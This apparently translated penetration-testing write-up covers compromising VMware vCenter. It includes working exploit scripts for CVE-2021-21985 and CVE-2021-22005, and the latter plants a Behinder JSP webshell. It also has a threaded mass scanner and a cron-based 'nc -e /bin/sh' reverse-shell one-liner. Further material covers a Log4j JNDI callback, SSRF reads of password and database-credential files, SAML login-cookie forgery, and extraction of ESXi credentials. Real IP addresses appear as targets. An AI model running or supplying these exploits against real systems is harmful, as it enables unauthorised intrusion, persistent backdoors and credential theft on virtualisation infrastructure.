Summary of vCenter Vulnerability Exploitation

Introduction

VMware vCenter is VMware's centralised virtualisation management platform and one of the core components of the VMware vSphere virtualisation suite. Its main job is to manage and monitor the whole vSphere infrastructure, including multiple ESXi hosts and the virtual machines running on them.

vSphere

vSphere is the umbrella name for VMware's virtualisation platform: a complete solution made up of several components used to build and manage virtualised environments. Its main components are:

  • VMware ESXi (formerly ESX): the core of vSphere. It is a bare-metal hypervisor installed directly on the physical server in place of a conventional operating system such as Windows or Linux. Once installed and booted it runs unattended and immediately starts managing and running virtual machines; no interactive login is needed for it to operate.
  • VMware vCenter Server: the centralised management platform of vSphere, used to manage and monitor virtual machines across many ESXi hosts. vCenter provides a web interface (the vSphere Client) that administrators log in to in order to manage the whole vSphere environment.

The "VMware® vSphere" login page you usually come across is vCenter's login page. ESXi itself has no vSphere Client login page (a single host can still be administered through its own ESXi Host Client or the console DCUI).

vSphere = ESXi + vCenter

FOFA search

title="+ ID_VC_Welcome +"

Checking the vCenter version

Method 1:

/sdk/vimServiceVersions.xml

The returned XML lists the vim25 API versions the server supports; in the author's example the current version was 6.7.3 (API version 6.7.3 corresponds to vCenter 6.7 Update 3).

Method 2:

Calling the vSphere SOAP API (RetrieveServiceContent, which needs no authentication) returns the ServiceContent, whose "about" block carries the product name, version and build. The request looks like this:

POST /sdk HTTP/1.1
Host: portal.vpsssd.vn:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 579

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope
    xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
    xmlns:xsd="http://www.w3.org/2001/XMLSchema"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
    <soap:Header>
        <operationID>00000001-00000001</operationID>
    </soap:Header>
    <soap:Body>
        <RetrieveServiceContent
            xmlns="urn:internalvim25">
            <_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>
        </RetrieveServiceContent>
    </soap:Body>
</soap:Envelope>
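As an added example (not code from the original post), the script below turns both fingerprinting methods into a small parser: it extracts the current API version from vimServiceVersions.xml and the "about" fields from a RetrieveServiceContent response. The two sample XML documents are constructed to mirror the shape of the real responses; the build number and instance UUID in them are placeholders, and the `fingerprint()` helper, which talks to a live vCenter, needs network access and the requests library.

```python
"""Fingerprint a vCenter build from its unauthenticated SOAP metadata.

Example added to this write-up (not code from the original post). The two sample
documents are constructed to mirror the shape of real responses; the build number
and UUID are placeholders."""
import xml.etree.ElementTree as ET

VIM25 = "urn:vim25"

# Constructed sample of GET /sdk/vimServiceVersions.xml (method 1)
SAMPLE_VERSIONS_XML = """<?xml version="1.0" encoding="UTF-8" ?>
<namespaces version="1.0">
  <namespace>
    <name>urn:vim25</name>
    <version>6.7.3</version>
    <priorVersions>
      <version>6.7.2</version>
      <version>6.7.1</version>
      <version>6.7</version>
      <version>6.5</version>
    </priorVersions>
  </namespace>
</namespaces>
"""

# Constructed sample of a RetrieveServiceContent response (method 2), trimmed to
# the <about> block; real responses carry many more ServiceContent elements
SAMPLE_SERVICE_CONTENT = """<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<RetrieveServiceContentResponse xmlns="urn:vim25"><returnval>
<rootFolder type="Folder">group-d1</rootFolder>
<about>
<name>VMware vCenter Server</name>
<fullName>VMware vCenter Server 6.7.0 build-00000000</fullName>
<vendor>VMware, Inc.</vendor>
<version>6.7.0</version>
<build>00000000</build>
<osType>linux-x64</osType>
<productLineId>vpx</productLineId>
<apiType>VirtualCenter</apiType>
<apiVersion>6.7.3</apiVersion>
<instanceUuid>00000000-0000-0000-0000-000000000000</instanceUuid>
</about>
</returnval></RetrieveServiceContentResponse>
</soapenv:Body>
</soapenv:Envelope>
"""

# The request body shown in the write-up above (no credentials needed)
RETRIEVE_SERVICE_CONTENT = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"'
    ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
    '<soap:Body><RetrieveServiceContent xmlns="urn:internalvim25">'
    '<_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this>'
    '</RetrieveServiceContent></soap:Body></soap:Envelope>'
)

ABOUT_FIELDS = ("name", "fullName", "version", "build", "apiVersion", "apiType", "osType", "productLineId")


def _local(tag):
    """Strip the namespace from an ElementTree tag ('{urn:vim25}about' -> 'about')."""
    return tag.rsplit("}", 1)[-1]


def parse_vim_service_versions(xml_text):
    """Current API version advertised for urn:vim25 (6.7.3 means 6.7 Update 3)."""
    root = ET.fromstring(xml_text)
    for ns in root.iter("namespace"):
        if ns.findtext("name") == VIM25:
            return ns.findtext("version")
    return None


def parse_service_content(xml_text):
    """AboutInfo fields from a RetrieveServiceContent response, namespace-agnostic."""
    root = ET.fromstring(xml_text)
    about = next((e for e in root.iter() if _local(e.tag) == "about"), None)
    if about is None:
        raise ValueError("no <about> element: not a RetrieveServiceContent response")
    return {f: next((c.text for c in about if _local(c.tag) == f), None) for f in ABOUT_FIELDS}


def fingerprint(base_url, timeout=10):
    """Query a live vCenter (e.g. https://host or https://host:8443); needs network access."""
    import requests
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    base = base_url.rstrip("/")
    info = {}
    r = requests.get(base + "/sdk/vimServiceVersions.xml", verify=False, timeout=timeout)
    if r.ok:
        info["vimServiceVersion"] = parse_vim_service_versions(r.text)
    r = requests.post(base + "/sdk", data=RETRIEVE_SERVICE_CONTENT,
                      headers={"Content-Type": "text/xml"}, verify=False, timeout=timeout)
    if r.ok:
        info.update(parse_service_content(r.text))
    return info


if __name__ == "__main__":
    import sys
    # With a URL argument: fingerprint that host; without one: parse the constructed sample
    info = fingerprint(sys.argv[1]) if len(sys.argv) > 1 else parse_service_content(SAMPLE_SERVICE_CONTENT)
    for k, v in info.items():
        print("%-18s %s" % (k, v))
```

The "about" block gives the product version and the build number together, which is what you need when matching a target against the fixed builds listed in the advisories below; the vimServiceVersions.xml value only tells you the API level.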

Vulnerabilities

CVE-2021-21972 file upload

Description

The vSphere Client (HTML5) plugin in vCenter Server contains a remote code execution vulnerability. An unauthenticated attacker who can reach port 443 can send a crafted request to vCenter Server, write a webshell to disk and thereby execute arbitrary code on the server.

Affected versions

  • 7.0 <= vCenter Server < 7.0 U1c
  • 6.7 <= vCenter Server < 6.7 U3l
  • 6.5 <= vCenter Server < 6.5 U3n

Detection

Request the path below with GET. A 404 means the vulnerable plugin endpoint is not present; a 405 (Method Not Allowed, because the endpoint only accepts POST) means it is reachable and the host may be vulnerable. A 405 on its own does not prove exploitability, so check the version as well.

/ui/vropspluginui/rest/services/uploadova

import requests, threading
import concurrent.futures
import os
requests.packages.urllib3.disable_warnings()

lock = threading.Lock()  # serialise output from the worker threads
# Optional interception proxy (e.g. Burp): export HTTPS_PROXY=http://127.0.0.1:8080
proxies = {'https': os.environ['HTTPS_PROXY']} if os.environ.get('HTTPS_PROXY') else None
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}

def run(target):
    url = target.rstrip('/') + "/ui/vropspluginui/rest/services/uploadova"
    try:
        resp = requests.get(url=url, headers=header, verify=False, proxies=proxies, timeout=10)
        code = resp.status_code
        with lock:
            if code == 405:
                # the endpoint only accepts POST, so a 405 on GET means the plugin path is exposed
                print("[+]%s possibly vulnerable (HTTP %d)" % (url, code))
            else:
                print("[-]%s not vulnerable (HTTP %d)" % (url, code))
    except Exception as e:
        # a network error is not evidence either way; report it separately
        with lock:
            print("[!]%s request failed: %s" % (url, e))


if __name__ == "__main__":
    urls = [url.strip() for url in open("url.txt", "r", encoding="utf-8") if url.strip()]

    max_workers = 800
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
        executor.map(run, urls)

Exploitation

Script: GitHub - Schira4396/VcenterKiller: an all-in-one exploitation tool for vCenter covering the most common issues, CVE-2021-21972, CVE-2021-21985 and CVE-2021-22005, the Workspace ONE Access CVE-2022-22954 and CVE-2022-22972/31656, and Log4j. It can upload a webshell in one step, execute commands, or upload an SSH public key for password-less SSH access.

vckiller_windows_amd64.exe -u https://ip:8443 -m 21972 -f shell.jsp

CVE-2021-21985 RCE

Description

The Virtual SAN Health Check plugin (vsan-h5-client.zip), which is enabled by default, exposes its /rest/* endpoints without authentication. Those endpoints reflectively invoke methods on service beans, and that unsafe reflection can be abused for RCE.

Affected versions

  • 7.0 <= vCenter Server < 7.0 U2b
  • 6.7 <= vCenter Server < 6.7 U3n
  • 6.5 <= vCenter Server < 6.5 U3p
  • 4.x <= Cloud Foundation (vCenter Server) < 4.2.1
  • 3.x <= Cloud Foundation (vCenter Server) < 3.10.2.1

Detection

POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
Host: 54.xx.xx.157
User-Agent: python-requests/2.30.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 88

{"methodInput": [{"type": "ClusterComputeResource", "value": null, "serverGuid": null}]}

If the response comes back as shown in the author's screenshot (not reproduced here), the vulnerability is present.

Command execution

#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@Author: r0cky
@Time: 2021/6/3-16:57
"""
import base64
import json
import os
import sys
import zipfile
from urllib.parse import urlparse

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Optional interception proxy (e.g. Burp): export HTTPS_PROXY=http://127.0.0.1:8080
proxies = {'https': os.environ['HTTPS_PROXY']} if os.environ.get('HTTPS_PROXY') else None
headers = {"Content-Type": "application/json"}


def banner():
    print("""
==============================================================
         _____           _              _____   _____ ______ 
        / ____|         | |            |  __ \ / ____|  ____|
 __   _| |     ___ _ __ | |_ ___ _ __  | |__) | |    | |__   
 \ \ / / |    / _ \ '_ \| __/ _ \ '__| |  _  /| |    |  __|  
  \ V /| |___|  __/ | | | ||  __/ |    | | \ \| |____| |____ 
   \_/  \_____\___|_| |_|\__\___|_|    |_|  \_\\_____|______|

                              Powered by r0cky Team ZionLab
==============================================================
    """)


def create_xml(cmd):
    # Spring bean definition: ProcessBuilder runs the command, and the SpEL expression
    # stores its output in the JVM system property "output", which poc2 reads back
    print("[*] Create Xml to offline_bundle.xml ...")
    context = """<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
          <list>
            <value>/bin/bash</value>
            <value>-c</value>
            <value><![CDATA[ {cmd} 2>&1 ]]></value>
          </list>
        </constructor-arg>
    </bean>
    <bean id="is" class="java.io.InputStreamReader">
        <constructor-arg>
            <value>#{pb.start().getInputStream()}</value>
        </constructor-arg>
    </bean>
    <bean id="br" class="java.io.BufferedReader">
        <constructor-arg>
            <value>#{is}</value>
        </constructor-arg>
    </bean>
    <bean id="collectors" class="java.util.stream.Collectors"></bean>
    <bean id="system" class="java.lang.System">
        <property name="whatever" value="#{ system.setProperty(&quot;output&quot;, br.lines().collect(collectors.joining(&quot;\n&quot;))) }"/>
    </bean>
</beans>
""".replace("{cmd}", cmd)
    with open('offline_bundle.xml', 'w') as wf:
        wf.write(context)


def create_zip():
    print("[*] Create Zip to offline_bundle.zip ...")
    with zipfile.ZipFile('offline_bundle.zip', 'w', zipfile.ZIP_DEFLATED) as zp:
        zp.write('offline_bundle.xml')


def toBase64():
    with open('offline_bundle.zip', 'rb') as rf:
        return base64.b64encode(rf.read()).decode()


def poc1(url):
    # loadVmodlPackages fetches the "offline bundle" from a data: URI through the vSAN
    # health proxy; Spring parses the embedded bean XML and evaluates the SpEL expressions
    ssrf_str = "https://localhost:443/vsanHealth/vum/driverOfflineBundle/data:text/html%3Bbase64,{}%23"
    ssrf = ssrf_str.format(toBase64())

    print("[*] Get XML to SystemProperties  ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/vmodlContext/loadVmodlPackages"
    data = {"methodInput": [[ssrf]]}
    requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)


def poc2(url, cmd):
    # Read the command output back out of the "output" system property
    print("[*] getProperty   ...")
    target = url + "/ui/h5-vsan/rest/proxy/service/systemProperties/getProperty"
    data = {"methodInput": ["output", None]}
    r = requests.post(target, data=json.dumps(data), headers=headers, verify=False, proxies=proxies)
    if "result" in r.json():
        print("[+] Command:", cmd)
        print(r.json()['result'])
    else:
        print("[-] send payload failed.")


def main(url, cmd):
    try:
        create_xml(cmd)
        create_zip()
        poc1(url)
        poc2(url, cmd)
    except Exception as e:
        print("[-] send payload failed: %s" % e)


if __name__ == '__main__':
    banner()
    if len(sys.argv) != 3:
        print("Example: \n\tpython3 " + sys.argv[0] + " <target> <cmd>\n")
        sys.exit(1)
    up = urlparse(sys.argv[1])
    main(up.scheme + "://" + up.netloc, sys.argv[2])

Reverse shell: see "CVE-2021-21985: VMware vCenter Server RCE reproduction" (Tencent Cloud Developer Community)

CVE-2021-22005 file upload

Description

On 22 September 2021 VMware published a security advisory disclosing several high and critical severity vulnerabilities, among them CVE-2021-22005, an arbitrary file upload in VMware vCenter Server. An attacker can send crafted requests to the Analytics service in vCenter to upload a malicious file, leading to remote code execution.

Affected versions

  • VMware vCenter Server 7.0 series < 7.0 U2c
  • VMware vCenter Server 6.7 series < 6.7 U3o
  • VMware vCenter Server 6.5 series: not affected

Detection

Request /analytics/telemetry/ph/api/level to determine whether the server is affected

  • If it responds 200 OK with anything other than "OFF" in the body (for example "FULL"), it is vulnerable.
  • If it responds 200 OK with "OFF" in the body, it is most likely not vulnerable; it has neither been patched nor had any workaround applied.
  • Any other response means the vulnerability is not present.

import requests, threading
import concurrent.futures
import os
requests.packages.urllib3.disable_warnings()

lock = threading.Lock()  # serialise output from the worker threads
# Optional interception proxy (e.g. Burp): export HTTPS_PROXY=http://127.0.0.1:8080
proxies = {'https': os.environ['HTTPS_PROXY']} if os.environ.get('HTTPS_PROXY') else None
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0'}

def run(target):
    url = target.rstrip('/') + "/analytics/telemetry/ph/api/level?_c=test"
    try:
        resp = requests.get(url=url, headers=header, verify=False, proxies=proxies, timeout=10)
        code = resp.status_code
        level = resp.text.strip()
        with lock:
            if code == 200 and "OFF" not in resp.text:
                # 200 with any level other than OFF (e.g. FULL) means the telemetry endpoint is live and unpatched
                print("[+]%s possibly vulnerable (level=%s)" % (url, level))
            elif code == 200:
                print("[-]%s telemetry level OFF, probably not vulnerable" % url)
            else:
                print("[-]%s not vulnerable (HTTP %d)" % (url, code))
    except Exception as e:
        # a network error is not evidence either way; report it separately
        with lock:
            print("[!]%s request failed: %s" % (url, e))


if __name__ == "__main__":
    urls = [url.strip() for url in open("url.txt", "r", encoding="utf-8") if url.strip()]

    max_workers = 800
    with concurrent.futures.ThreadPoolExecutor(max_workers=max_workers) as executor:
        executor.map(run, urls)

Exploitation

import requests
import random
import string
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))
    
def escape(_str):
    _str = _str.replace("&", "&amp;")
    _str = _str.replace("<", "&lt;")
    _str = _str.replace(">", "&gt;")
    _str = _str.replace("\"", "&quot;")
    return _str
    
def str_to_escaped_unicode(arg_str):
    escaped_str = ''
    for s in arg_str:
        val = ord(s)
        esc_uni = "\\u{:04x}".format(val)
        escaped_str += esc_uni
    return escaped_str
 
 
def createAgent(target, agent_name, log_param):
 
    
    url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?_c=%s&_i=%s" % (target, agent_name, log_param)
    headers = { "Cache-Control": "max-age=0", 
               "Upgrade-Insecure-Requests": "1", 
               "User-Agent": "Mozilla/5.0", 
               "X-Deployment-Secret": "abc", 
               "Content-Type": "application/json", 
               "Connection": "close" }
               
    json_data = { "manifestSpec":{}, 
                  "objectType": "a2",
                  "collectionTriggerDataNeeded":  True,
                  "deploymentDataNeeded":True, 
                  "resultNeeded": True, 
                  "signalCollectionCompleted":True, 
                  "localManifestPath": "a7",
                  "localPayloadPath": "a8",
                  "localObfuscationMapPath": "a9" }
                  
    requests.post(url, headers=headers, json=json_data, verify=False)
    
 
def generate_manifest(webshell_location, webshell):
 
    manifestData = """<manifest recommendedPageSize="500">
       <request>
          <query name="vir:VCenter">
             <constraint>
                <targetType>ServiceInstance</targetType>
             </constraint>
             <propertySpec>
                <propertyNames>content.about.instanceUuid</propertyNames>
                <propertyNames>content.about.osType</propertyNames>
                <propertyNames>content.about.build</propertyNames>
                <propertyNames>content.about.version</propertyNames>
             </propertySpec>
          </query>
       </request>
       <cdfMapping>
          <indepedentResultsMapping>
             <resultSetMappings>
                <entry>
                   <key>vir:VCenter</key>
                   <value>
                      <value xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="resultSetMapping">
                         <resourceItemToJsonLdMapping>
                            <forType>ServiceInstance</forType>
                         <mappingCode><![CDATA[    
                            #set($appender = $GLOBAL-logger.logger.parent.getAppender("LOGFILE"))##
                            #set($orig_log = $appender.getFile())##
                            #set($logger = $GLOBAL-logger.logger.parent)##     
                            $appender.setFile("%s")##     
                            $appender.activateOptions()##  
                            $logger.warn("%s")##   
                            $appender.setFile($orig_log)##     
                            $appender.activateOptions()##]]>
                         </mappingCode>
                         </resourceItemToJsonLdMapping>
                      </value>
                   </value>
                </entry>
             </resultSetMappings>
          </indepedentResultsMapping>
       </cdfMapping>
       <requestSchedules>
          <schedule interval="1h">
             <queries>
                <query>vir:VCenter</query>
             </queries>
          </schedule>
       </requestSchedules>
    </manifest>""" % (webshell_location, webshell)
    
    return manifestData
 
def arg():
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", help = "Target", required = True)
    args = parser.parse_args()
    target = args.target
    print("[*] Target: %s" % target)
    return target
 
def main():
    target = arg()
    # Variables
    log_param = id_generator(6)
    agent_name = id_generator(6)
    shell_name = "Server.jsp"
    # Behinder (冰蝎) 3.0 JSP shell; the AES key is the first 16 characters of md5(connection password), default password "rebeyond"
    webshell = """<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*first 16 chars of the md5 of the connection password; default password rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"""
 
    # The manifest re-points the log4j appender at this path, so the "log message" lands on disk as a JSP inside the STS webapp
    webshell_location =  "/usr/lib/vmware-sso/vmware-sts/webapps/ROOT/%s" % shell_name
    webshell = str_to_escaped_unicode(webshell)
    manifestData = generate_manifest(webshell_location,webshell)
    print("[*] Creating Agent")
    createAgent(target, agent_name, log_param)
    url = "%s/analytics/ceip/sdk/..;/..;/..;/analytics/ph/api/dataapp/agent?action=collect&_c=%s&_i=%s" % (target, agent_name, log_param)
    headers = {"Cache-Control": "max-age=0", 
                     "Upgrade-Insecure-Requests": "1", 
                     "User-Agent": "Mozilla/5.0", 
                     "X-Deployment-Secret": "abc", 
                     "Content-Type": "application/json", 
                     "Connection": "close"}
    json_data ={"contextData": "a3", "manifestContent": manifestData, "objectId": "a2"}
    requests.post(url, headers=headers, json=json_data, verify=False)
    # webshell URL: the STS ROOT webapp is reached through the /idm/..; path
    url = "%s/idm/..;/%s" % (target, shell_name)
    code = requests.get(url=url, headers=headers,verify=False).status_code
    if code != 404:  # status_code is an int
        print("webshell URL: %s" % url)
        print("[*] Behinder 3.0 webshell connection password: rebeyond")
    else:
        print("webshell not found")
 
 
if __name__ == '__main__':
    main()

CVE-2021-22005poc.py -t https://103.154.100.22:8443

Reverse shell

Another way to exploit the same path traversal is to write the reverse-shell command straight into a cron job (the empty -H Content-Type: removes curl's default Content-Type header):

curl -kv "https://xx.xx.xx.xx/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM" -H Content-Type: -d "* * * * * root nc -e /bin/sh <vps ip> 6666"

Then catch the reverse shell on the VPS.

vCenter SSRF file read vulnerability

Description

Certain versions of VMware vCenter 7.0.x contain an unauthenticated SSRF. The getProviderLogo function of the h5-vcav-bootstrap-service component does not validate the provider-logo url parameter and uses it directly to make a URL request, so the file:// scheme can be used to read arbitrary files. No CVE number had been assigned at the time of writing.

Affected versions

  • VMware vCenter Server 7.0.2.00100
  • VMware vCenter Server 7.0.2.00000
  • VMware vCenter Server 7.0.1.1

Detection

/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file://c:\windows\System32\drivers\etc\hosts
#read the PostgreSQL configuration file (holds the VCDB credentials):
/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/vmware-vpx/vcdb.properties

GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd HTTP/1.1
Host: 54.xx.xx.157
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
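As an added example (not code from the original post), the helper below reads a file through the provider-logo endpoint and parses the vcdb.properties it returns into the parameters psql needs later in this write-up. The sample properties file is constructed with placeholder values, the parser assumes the usual Java "key = value" layout of that file, and `read_file_via_ssrf()` needs network access and the requests library.

```python
"""Read files through the unauthenticated provider-logo SSRF and parse vcdb.properties.
Example added to this write-up; not code from the original post."""
import re
from urllib.parse import quote

LOGO_ENDPOINT = "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url="

# Constructed sample of /etc/vmware-vpx/vcdb.properties; every value is a placeholder
SAMPLE_VCDB_PROPERTIES = """# VMware VirtualCenter database configuration
driver = org.postgresql.Driver
dbtype = PostgreSQL
url = jdbc:postgresql://localhost:5432/VCDB
username = vc
password = EXAMPLE-placeholder-password
password.encrypted = false
"""


def parse_properties(text):
    """Minimal Java .properties reader: 'key = value' or 'key: value', '#'/'!' comment lines."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def db_connection_params(props):
    """Map vcdb.properties onto what psql needs; VCDB only listens on the vCenter host itself."""
    m = re.match(r"jdbc:postgresql://([^:/]+)(?::(\d+))?/([^?]+)", props.get("url", ""))
    if not m:
        raise ValueError("unrecognised jdbc url: %r" % props.get("url"))
    return {
        "host": m.group(1),
        "port": int(m.group(2) or 5432),
        "dbname": m.group(3),
        "user": props.get("username"),
        "password": props.get("password"),
        # if true, the value is not a usable plaintext password
        "encrypted": props.get("password.encrypted", "false").lower() == "true",
    }


def read_file_via_ssrf(base_url, path, timeout=10):
    """GET the logo endpoint with a file:// URL; returns the raw body or None (needs network)."""
    import requests
    import urllib3
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    url = base_url.rstrip("/") + LOGO_ENDPOINT + quote("file://" + path, safe=":/")
    r = requests.get(url, verify=False, timeout=timeout, headers={"User-Agent": "Mozilla/5.0"})
    return r.content if r.status_code == 200 and r.content else None


def dump_vcdb_credentials(base_url):
    """Fetch /etc/vmware-vpx/vcdb.properties over the SSRF and return the parsed DB parameters."""
    body = read_file_via_ssrf(base_url, "/etc/vmware-vpx/vcdb.properties")
    if body is None:
        return None
    return db_connection_params(parse_properties(body.decode("utf-8", "replace")))


if __name__ == "__main__":
    import sys
    # With a URL argument: read the live file; without one: parse the constructed sample
    params = dump_vcdb_credentials(sys.argv[1]) if len(sys.argv) > 1 \
        else db_connection_params(parse_properties(SAMPLE_VCDB_PROPERTIES))
    print(params)
```

Because VCDB only accepts local connections, the credentials recovered this way are used on the vCenter host itself (see the psql query further down), not from the attacker's machine.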

vCenter arbitrary file read (/eam/vib)

Details

Specific versions of VMware vCenter have an arbitrary file read vulnerability: a crafted request to the ESX Agent Manager (eam) vib endpoint returns arbitrary files from the server.

Affected versions

  • VMware vCenter 6.5.0a-f
  • Fixed version: VMware vCenter 6.5u1

Reproduction

https://ip/eam/vib?id=/etc/passwd

/etc/shadow cannot be read this way

vCenter Log4j JNDI RCE CVE-2021-44228

Details

VMware vCenter Log4j JNDI RCE (CVE-2021-44228, Log4Shell) is a remote code execution vulnerability affecting vCenter Server 6.5, 6.7 and 7.0. It stems from the vulnerable Log4j 2 library bundled with vCenter, not from a configuration mistake; an attacker can use it to execute arbitrary code remotely. A known trigger point is the X-Forwarded-For header on the websso SAML endpoint.

Detection

GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
X-Forwarded-For: ${jndi:ldap://x.25vk6n.ceye.io}
Connection: close

I did not find a vulnerable target, so there is no record here; only the test procedure is shown. Because the underlying flaw is in Log4j itself and vCenter merely bundles the component, an ordinary Log4j scanner should be able to detect it if the vulnerability is present.

Exploitation

Tool: VcenterKiller

For more details see:

vCenter all-in-one exploitation tools

VcenterKiller: GitHub - Schira4396/VcenterKiller: an all-in-one exploitation tool for vCenter covering the most common issues, CVE-2021-21972, CVE-2021-21985 and CVE-2021-22005, the Workspace ONE Access CVE-2022-22954 and CVE-2022-22972/31656, and Log4j. It can upload a webshell in one step, execute commands, or upload an SSH public key for password-less SSH access. It only exploits; it has no detection functionality.

Getting access to the vCenter web console

Having obtained a shell on the server that hosts vCenter, you still cannot log in to the management console, because that requires a password.

There are two approaches:

  1. Forge a vCenter login cookie with the SAML script (which extracts the signing material and forges the token) and log in to the console with it.
  2. Reset the password directly with vdcadmintool. The original password cannot be recovered afterwards, and the administrator will notice the change.

Cookie login

"SAML certificate login" in practice means obtaining a valid session cookie and using it to log in to the web console.

Single Sign-On was introduced in vSphere 5.1 and uses SAML tokens for authentication. When a user logs in to a service, the service forwards the authentication request to SSO, which verifies the user's credentials and checks whether they are authorised to access that service.

On the vCenter host, extract the IdP certificate and signing key from /storage/db/vmware-vmdir/data.mdb, craft a SAML response for the administrator user, authenticate against the vCenter server with it, and receive a valid administrator cookie.

First obtain the database file from vCenter:

  • Linux: /storage/db/vmware-vmdir/data.mdb
  • Windows: C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb

Use the SAML forging script to generate the cookie; running it on Kali is recommended. The Python modules it depends on need the build tools and the OpenLDAP development packages installed first:

sudo apt install python3-dev libldap2-dev libsasl2-dev libssl-dev
#install the Python dependencies
pip3 install -r requirements.txt

Run

python3 vcenter_saml_login.py -p data.mdb -t vcenterip

I hit an error here; see: "Summary of practical vCenter exploitation techniques" (Tencent Cloud Developer Community)

Recovering passwords without a reset

1. Find the SSO domain

#Linux
/usr/lib/vmware-vmafd/bin/vmafd-cli get-domain-name --server-name localhost

#Windows
C:\Program Files\VMware\vCenter Server\vmafdd\vmafd-cli get-domain-name --server-name localhost
#the space in the path breaks command parsing; quote the path component that contains the space
C:\PROGRA~1\VMware\"vCenter Server"\vmafdd\vmafd-cli get-domain-name --server-name localhost

2. Get the decryption key

#Linux
cat /etc/vmware-vpx/ssl/symkey.dat

#Windows
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat

3. Get the database credentials

vCenter keeps its database settings in vcdb.properties, which contains the database username and password in plain text

#Linux
cat /etc/vmware-vpx/vcdb.properties
cat /etc/vmware/service-state/vpxd/vcdb.properties

#Windows
type C:\ProgramData\VMware\"VMware VirtualCenter"\vcdb.properties
type C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties

The database is PostgreSQL by default and only accepts local connections, so the query that pulls the ESXi host credentials has to be run on the vCenter server itself

#default psql location
Windows: C:\Program Files\VMware\vCenter Server\vPostgres\bin\psql.exe
Linux:
#x is the version number; fill in the one actually installed (the "current" symlink usually points at it)
cd /opt/vmware/vpostgres/x/bin/

#run the query (psql does not read the password from stdin; pass it through PGPASSWORD)
